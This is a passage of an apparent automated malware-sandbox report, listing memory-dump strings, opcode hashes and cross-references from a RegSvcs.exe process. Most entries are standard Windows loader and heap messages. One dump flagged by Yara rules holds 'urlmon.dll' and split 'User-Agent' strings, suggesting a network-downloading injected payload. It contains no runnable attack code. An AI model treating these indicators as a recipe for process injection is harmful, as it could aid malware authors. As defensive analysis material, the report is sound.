                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                          • API String ID: 0-2368682639
                                                          • Opcode ID: 2517e894f181e9506d3d0ce91acbf08a870647312333de09a87296dd8ce1d519
                                                          • Instruction ID: adc4de6e5c4c1be5c308a5eddd7f070bae32119ffe93db2509140af09452996a
                                                          • Opcode Fuzzy Hash: 2517e894f181e9506d3d0ce91acbf08a870647312333de09a87296dd8ce1d519
                                                          • Instruction Fuzzy Hash: 0D81CEB1A40359EFDB20CF9AC940BAEBBB5FB58704F65411BF504BB260D371A945CB60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 014A2409
                                                          • RtlpResolveAssemblyStorageMapEntry, xrefs: 014A261F
                                                          • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 014A24C0
                                                          • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 014A2498
                                                          • @, xrefs: 014A259B
                                                          • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 014A22E4
                                                          • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 014A2412
                                                          • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 014A2624
                                                          • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 014A2602
                                                          • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 014A2506
                                                          • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 014A25EB
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                          • API String ID: 0-4009184096
                                                          • Opcode ID: ffff91b28ff25272201412b8cfc114881653171cae8991f7e34286b25920e3fd
                                                          • Instruction ID: b0e3cdfc28b0e7b777ac429db71dfcc598866fbc7b84486b406d89a0aca22f24
                                                          • Opcode Fuzzy Hash: ffff91b28ff25272201412b8cfc114881653171cae8991f7e34286b25920e3fd
                                                          • Instruction Fuzzy Hash: 78026FF1D00229ABDB21DB54CC80FDAB7B8AB64304F4141EBE60DA7261D7B09E85CF59
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                          • API String ID: 0-2515994595
                                                          • Opcode ID: 67c01c77e37ba979e17942c0e5b41928b0714502daf1cc3d29872c4fcf4101a0
                                                          • Instruction ID: 04921891b27b89282a6ef37c9c511cfcd20fc71b93f757b4bb2755a18b0fb013
                                                          • Opcode Fuzzy Hash: 67c01c77e37ba979e17942c0e5b41928b0714502daf1cc3d29872c4fcf4101a0
                                                          • Instruction Fuzzy Hash: CB51D2711043029BDB26CF198854BBBBBECEF94640F14492FE994C32A0E770D605C792
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                          • API String ID: 0-1700792311
                                                          • Opcode ID: d4d56f8c0c8c865fb1fae65db2a8a95ad9c2443c329c27b7c639b054fecbbaf2
                                                          • Instruction ID: 162473c436fed44313ac3ec7f910fc481362a9c4894819396c5b497cb0019ed7
                                                          • Opcode Fuzzy Hash: d4d56f8c0c8c865fb1fae65db2a8a95ad9c2443c329c27b7c639b054fecbbaf2
                                                          • Instruction Fuzzy Hash: F0D1CD31600682DFDB22DF69C448AAABBF1FF5A611F18805EE4659B372C7B49981CF10
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          • VerifierDebug, xrefs: 014B8CA5
                                                          • HandleTraces, xrefs: 014B8C8F
                                                          • VerifierFlags, xrefs: 014B8C50
                                                          • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 014B8A3D
                                                          • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 014B8A67
                                                          • VerifierDlls, xrefs: 014B8CBD
                                                          • AVRF: -*- final list of providers -*- , xrefs: 014B8B8F
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                          • API String ID: 0-3223716464
                                                          • Opcode ID: 9ef7834cc52e53aa2abe47ff3fb2328ea135c9c35ceb49233b82cb432eab9999
                                                          • Instruction ID: def84bfdbd736f43332389472734a97d20ebf7d3b3d4aca39c8420e273902d38
                                                          • Opcode Fuzzy Hash: 9ef7834cc52e53aa2abe47ff3fb2328ea135c9c35ceb49233b82cb432eab9999
                                                          • Instruction Fuzzy Hash: 2D9122B2605313ABD322DF29C8C0BAB77ACAB66B14F45045FFA406F2B1D7709C0587A5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                          • API String ID: 0-1109411897
                                                          • Opcode ID: 329510177647b71282a02b8bbf0b2a0669c2950265575750c675289ac5e8c5ff
                                                          • Instruction ID: f1138726ce4022a88464f5a102e53caab3c8889bea6f61d51a35a9daa4146bbb
                                                          • Opcode Fuzzy Hash: 329510177647b71282a02b8bbf0b2a0669c2950265575750c675289ac5e8c5ff
                                                          • Instruction Fuzzy Hash: D3A23F74E056298FDF64CF19C9887AABBB5AF89314F1442EAD50DA7360D7349E86CF00
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                          • API String ID: 0-792281065
                                                          • Opcode ID: 18e58e55c92e387ea1131f7f4a1501e7dcea31d4f420eb7ff35677dfcdac8d27
                                                          • Instruction ID: daefe9059892e906967c4a44bc7958f1c95be875e7e37a62b276bce6ebcf84d1
                                                          • Opcode Fuzzy Hash: 18e58e55c92e387ea1131f7f4a1501e7dcea31d4f420eb7ff35677dfcdac8d27
                                                          • Instruction Fuzzy Hash: 33916832B003159BEB35DF19D844BAE7BA5BB61B18F5E012FE9106B3B1D7B45802C791
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 01489A2A
                                                          • minkernel\ntdll\ldrinit.c, xrefs: 01489A11, 01489A3A
                                                          • Getting the shim engine exports failed with status 0x%08lx, xrefs: 01489A01
                                                          • apphelp.dll, xrefs: 01426496
                                                          • LdrpInitShimEngine, xrefs: 014899F4, 01489A07, 01489A30
                                                          • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 014899ED
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                          • API String ID: 0-204845295
                                                          • Opcode ID: e5fe3bf0312fc970714ca61769ecd3d78150796131b846673430e45543c32f76
                                                          • Instruction ID: d74a11ab1ec2f40baadb4214cadb4e5147d5d5984c449016f15e51b99df10fd1
                                                          • Opcode Fuzzy Hash: e5fe3bf0312fc970714ca61769ecd3d78150796131b846673430e45543c32f76
                                                          • Instruction Fuzzy Hash: 1951E3322087409FE720EF25D881FABB7E4FB94648F51091FF9969B270D670E944CB92
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 014A219F
                                                          • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 014A2178
                                                          • RtlGetAssemblyStorageRoot, xrefs: 014A2160, 014A219A, 014A21BA
                                                          • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 014A21BF
                                                          • SXS: %s() passed the empty activation context, xrefs: 014A2165
                                                          • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 014A2180
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                          • API String ID: 0-861424205
                                                          • Opcode ID: 9c5f17eb06850637d032b24019038268919839696198cbc42df582f6cda9673c
                                                          • Instruction ID: b83945741ee39e67429cfad23ba28c34ee86f32e4d6d1ac9a107a0858b362d85
                                                          • Opcode Fuzzy Hash: 9c5f17eb06850637d032b24019038268919839696198cbc42df582f6cda9673c
                                                          • Instruction Fuzzy Hash: F5313736B4021577E7218A9A8C81F5B7A6CDBB4A85F06406FFA0467274D2B0AE01D7A2
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          • minkernel\ntdll\ldrinit.c, xrefs: 0146C6C3
                                                          • Loading import redirection DLL: '%wZ', xrefs: 014A8170
                                                          • LdrpInitializeImportRedirection, xrefs: 014A8177, 014A81EB
                                                          • LdrpInitializeProcess, xrefs: 0146C6C4
                                                          • minkernel\ntdll\ldrredirect.c, xrefs: 014A8181, 014A81F5
                                                          • Unable to build import redirection Table, Status = 0x%x, xrefs: 014A81E5
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                          • API String ID: 0-475462383
                                                          • Opcode ID: 40e7f81506a3382a3b87c7c6b99abf47b25f2e5b9035102aa66c0b90e7c78d23
                                                          • Instruction ID: c256d4292078dd913814c2d66950422d09b165ac203f8709411593be105bb7bb
                                                          • Opcode Fuzzy Hash: 40e7f81506a3382a3b87c7c6b99abf47b25f2e5b9035102aa66c0b90e7c78d23
                                                          • Instruction Fuzzy Hash: F13104726443029BD320EF2AD985E2B77A5EFA4B14F05055EF9856B2B1E630ED04C7A2
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 01472DF0: LdrInitializeThunk.NTDLL ref: 01472DFA
                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01470BA3
                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01470BB6
                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01470D60
                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01470D74
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                          • String ID:
                                                          • API String ID: 1404860816-0
                                                          • Opcode ID: 69909d7356183be24aecf6e2f931d1a248ae4ddd020e17c65c44fd8fbf3f09c6
                                                          • Instruction ID: c70b5521b803c7bc17cdfdb492133c1034b29c079fd1ff57e92db0a48747a19e
                                                          • Opcode Fuzzy Hash: 69909d7356183be24aecf6e2f931d1a248ae4ddd020e17c65c44fd8fbf3f09c6
                                                          • Instruction Fuzzy Hash: D3426871900705DFDB21CF28C880BEAB7F5FF14314F1485AAE989AB251E770AA85CF60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2071471834.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_400000_RegSvcs.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Us$: $er-A$gent$urlmon.dll
                                                          • API String ID: 0-1367105278
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                          • API String ID: 0-379654539
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          • minkernel\ntdll\ldrinit.c, xrefs: 01468421
                                                          • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0146855E
                                                          • @, xrefs: 01468591
                                                          • LdrpInitializeProcess, xrefs: 01468422
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                          • API String ID: 0-1918872054
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 014A22B6
                                                          • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 014A21D9, 014A22B1
                                                          • .Local, xrefs: 014628D8
                                                          • SXS: %s() passed the empty activation context, xrefs: 014A21DE
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                          • API String ID: 0-1239276146
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 014A3456
                                                          • SXS: %s() called with invalid flags 0x%08lx, xrefs: 014A342A
                                                          • RtlDeactivateActivationContext, xrefs: 014A3425, 014A3432, 014A3451
                                                          • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 014A3437
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                          • API String ID: 0-1245972979
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 014910AE
                                                          • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01490FE5
                                                          • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01491028
                                                          • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0149106B
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                          • API String ID: 0-1468400865
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          • minkernel\ntdll\ldrinit.c, xrefs: 0149A9A2
                                                          • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0149A992
                                                          • apphelp.dll, xrefs: 01452462
                                                          • LdrpDynamicShimModule, xrefs: 0149A998
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                          • API String ID: 0-176724104
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          • HEAP: , xrefs: 01443264
                                                          • HEAP[%wZ]: , xrefs: 01443255
                                                          • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 0144327D
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                          • API String ID: 0-617086771
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                          • API String ID: 0-4253913091
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID: $@
                                                          • API String ID: 2994545307-1077428164
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: FilterFullPath$UseFilter$\??\
                                                          • API String ID: 0-2779062949
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          • minkernel\ntdll\ldrinit.c, xrefs: 0149A121
                                                          • Failed to allocated memory for shimmed module list, xrefs: 0149A10F
                                                          • LdrpCheckModule, xrefs: 0149A117
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                          • API String ID: 0-161242083
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                          • API String ID: 0-1334570610
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          • Failed to reallocate the system dirs string !, xrefs: 014A82D7
                                                          • minkernel\ntdll\ldrinit.c, xrefs: 014A82E8
                                                          • LdrpInitializePerUserWindowsDirectory, xrefs: 014A82DE
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                          • API String ID: 0-1783798831
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          • PreferredUILanguages, xrefs: 014EC212
                                                          • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 014EC1C5
                                                          • @, xrefs: 014EC1F1
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                          • API String ID: 0-2968386058
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                          • API String ID: 0-1373925480
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 014B4888
                                                          • LdrpCheckRedirection, xrefs: 014B488F
                                                          • minkernel\ntdll\ldrredirect.c, xrefs: 014B4899
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                          • API String ID: 0-3154609507
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          • minkernel\ntdll\ldrinit.c, xrefs: 014B2104
                                                          • Process initialization failed with status 0x%08lx, xrefs: 014B20F3
                                                          • LdrpInitializationFailure, xrefs: 014B20FA
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
